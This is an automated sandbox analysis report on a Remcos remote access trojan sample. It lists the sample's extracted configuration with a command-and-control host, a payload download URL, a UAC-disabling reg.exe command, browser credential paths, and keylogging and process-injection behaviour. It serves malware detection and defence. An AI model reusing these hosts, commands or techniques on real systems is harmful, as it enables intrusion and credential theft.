Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1vQ6RSHmz5.exe

Overview

General Information

Sample name:1vQ6RSHmz5.exe
renamed because original name is a hash value
Original sample name:566705afeb33d5a977708328cda48f1c.exe
Analysis ID:1465913
MD5:566705afeb33d5a977708328cda48f1c
SHA1:582441d0aca8c9217bdaa3526cbec9f377bb0555
SHA256:ce5c39f359a043c19eaee84bb1371c0e6cb9b72ee452d3748c00a8758d52d27f
Tags:32exe
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Sample uses process hollowing technique
Uses dynamic DNS services
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 1vQ6RSHmz5.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\1vQ6RSHmz5.exe" MD5: 566705AFEB33D5A977708328CDA48F1C)
    • iexplore.exe (PID: 6856 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "narutochwan.duckdns.org:2200:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-1VT363", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.2467244520.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6c4a8:$a1: Remcos restarted by watchdog!
        • 0x6ca20:$a3: %02i:%02i:%02i:%03i
        00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
        • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6656c:$str_b2: Executing file:
        • 0x675ec:$str_b3: GetDirectListeningPort
        • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x67118:$str_b7: \update.vbs
        • 0x66594:$str_b9: Downloaded file:
        • 0x66580:$str_b10: Downloading file:
        • 0x66624:$str_b12: Failed to upload file:
        • 0x675b4:$str_b13: StartForward
        • 0x675d4:$str_b14: StopForward
        • 0x67070:$str_b15: fso.DeleteFile "
        • 0x67004:$str_b16: On Error Resume Next
        • 0x670a0:$str_b17: fso.DeleteFolder "
        • 0x66614:$str_b18: Uploaded file:
        • 0x665d4:$str_b19: Unable to delete:
        • 0x67038:$str_b20: while fso.FileExists("
        • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
        Click to see the 10 entries
        SourceRuleDescriptionAuthorStrings
        2.2.iexplore.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          2.2.iexplore.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            2.2.iexplore.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6aaa8:$a1: Remcos restarted by watchdog!
            • 0x6b020:$a3: %02i:%02i:%02i:%03i
            2.2.iexplore.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
            • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
            • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x64b6c:$str_b2: Executing file:
            • 0x65bec:$str_b3: GetDirectListeningPort
            • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x65718:$str_b7: \update.vbs
            • 0x64b94:$str_b9: Downloaded file:
            • 0x64b80:$str_b10: Downloading file:
            • 0x64c24:$str_b12: Failed to upload file:
            • 0x65bb4:$str_b13: StartForward
            • 0x65bd4:$str_b14: StopForward
            • 0x65670:$str_b15: fso.DeleteFile "
            • 0x65604:$str_b16: On Error Resume Next
            • 0x656a0:$str_b17: fso.DeleteFolder "
            • 0x64c14:$str_b18: Uploaded file:
            • 0x64bd4:$str_b19: Unable to delete:
            • 0x65638:$str_b20: while fso.FileExists("
            • 0x650b1:$str_c0: [Firefox StoredLogins not found]
            2.2.iexplore.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
            • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x6497c:$s1: CoGetObject
            • 0x64990:$s1: CoGetObject
            • 0x649ac:$s1: CoGetObject
            • 0x6e938:$s1: CoGetObject
            • 0x6493c:$s2: Elevation:Administrator!new:
            Click to see the 5 entries

            Stealing of Sensitive Information

            barindex
            Source: Registry Key setAuthor: Joe Security: Data: Details: 54 E3 0B AD D0 AD 66 11 ED 43 ED 65 ED DD 15 0A E7 41 DD 96 FB B0 07 39 22 74 03 83 ED 25 92 37 99 51 B5 41 95 C8 E0 70 7B 8C F3 0D 24 95 03 BB 8C E7 44 AA 94 0F E3 D9 B8 0C 88 51 21 C9 1E DE 58 4F 41 2E C9 4C 3C D8 DE 11 77 57 7E 73 73 FD A2 84 AD 05 04 F0 F7 0E 44 10 72 FE 62 17 83 24 28 48 19 24 5E B3 EF 3B 6E 31 6F DA , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Internet Explorer\iexplore.exe, ProcessId: 6856, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-1VT363\exepath
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 1vQ6RSHmz5.exeAvira: detected
            Source: narutochwan.duckdns.orgAvira URL Cloud: Label: malware
            Source: 00000002.00000002.2467244520.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "narutochwan.duckdns.org:2200:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-1VT363", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Source: 1vQ6RSHmz5.exeVirustotal: Detection: 24%Perma Link
            Source: Yara matchFile source: 2.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2467244520.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1237129019.0000000003051000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 1vQ6RSHmz5.exe PID: 6664, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 6856, type: MEMORYSTR
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,2_2_00433837
            Source: 1vQ6RSHmz5.exe, 00000000.00000003.1237129019.0000000003051000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a41a8015-5

            Exploits

            barindex
            Source: Yara matchFile source: 2.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1237129019.0000000003051000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 1vQ6RSHmz5.exe PID: 6664, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 6856, type: MEMORYSTR

            Privilege Escalation

            barindex
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_004074FD _wcslen,CoGetObject,2_2_004074FD
            Source: 1vQ6RSHmz5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00409253
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_0041C291
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,2_2_0040C34D
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00409665
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0044E879 FindFirstFileExA,2_2_0044E879
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,2_2_0040880C
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040783C FindFirstFileW,FindNextFileW,2_2_0040783C
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00419AF5
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040BB30
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040BD37
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_00407C97

            Networking

            barindex
            Source: Malware configuration extractorURLs: narutochwan.duckdns.org
            Source: unknownDNS query: name: narutochwan.duckdns.org
            Source: global trafficTCP traffic: 192.168.2.7:49700 -> 91.92.242.76:2200
            Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: unknownTCP traffic detected without corresponding DNS query: 176.223.134.190
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0041B380
            Source: global trafficHTTP traffic detected: GET /x/re.txt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 176.223.134.190
            Source: global trafficDNS traffic detected: DNS query: narutochwan.duckdns.org
            Source: 1vQ6RSHmz5.exe, 00000000.00000003.1239154694.0000000000474000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000002.1240930531.0000000000474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.223.134.190/
            Source: 1vQ6RSHmz5.exe, 00000000.00000003.1239154694.0000000000474000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000002.1240930531.0000000000474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.223.134.190/:D
            Source: 1vQ6RSHmz5.exe, 00000000.00000003.1239154694.0000000000474000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000002.1240930531.0000000000474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.223.134.190/mD
            Source: 1vQ6RSHmz5.exe, 1vQ6RSHmz5.exe, 00000000.00000003.1239052882.000000000048B000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000002.1240839275.000000000043E000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000003.1239123601.000000000048D000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000002.1240979742.000000000048F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.223.134.190/x/re.txt
            Source: 1vQ6RSHmz5.exeString found in binary or memory: http://176.223.134.190/x/re.txt__vbaFreeVarList__vbaObjVarjC:
            Source: 1vQ6RSHmz5.exe, 1vQ6RSHmz5.exe, 00000000.00000003.1239052882.000000000048B000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000003.1239123601.000000000048D000.00000004.00000020.00020000.00000000.sdmp, 1vQ6RSHmz5.exe, 00000000.00000002.1240979742.000000000048F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.223.134.190:80/x/re.txt
            Source: iexplore.exeString found in binary or memory: http://geoplugin.net/json.gp
            Source: 1vQ6RSHmz5.exe, 00000000.00000003.1237129019.0000000003051000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000002_2_0040A2B8
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,2_2_0040B70E
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_004168C1
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,2_2_0040B70E
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,2_2_0040A3E0

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2467244520.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1237129019.0000000003051000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 1vQ6RSHmz5.exe PID: 6664, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: iexplore.exe PID: 6856, type: MEMORYSTR

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0041C9E2 SystemParametersInfoW,2_2_0041C9E2

            System Summary

            barindex
            Source: 2.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 2.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 2.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 2.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 2.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 2.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000000.00000003.1237129019.0000000003051000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: 1vQ6RSHmz5.exe PID: 6664, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: iexplore.exe PID: 6856, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00493BE3 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_3_00493BE3
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00493BE3 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_3_00493BE3
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_0049397B CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_3_0049397B
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_0049397B CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_3_0049397B
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00493BE3 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_3_00493BE3
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00493BE3 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_3_00493BE3
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_0049397B CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_3_0049397B
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_0049397B CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_3_0049397B
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,2_2_004167B4
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00493BE30_3_00493BE3
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00493BE30_3_00493BE3
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00496A570_3_00496A57
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00496A570_3_00496A57
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_0049397B0_3_0049397B
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_0049397B0_3_0049397B
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00493BE30_3_00493BE3
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00493BE30_3_00493BE3
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00496A570_3_00496A57
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_00496A570_3_00496A57
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_0049397B0_3_0049397B
            Source: C:\Users\user\Desktop\1vQ6RSHmz5.exeCode function: 0_3_0049397B0_3_0049397B
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0043E0CC2_2_0043E0CC
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0041F0FA2_2_0041F0FA
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_004541592_2_00454159
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_004381682_2_00438168
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_004461F02_2_004461F0
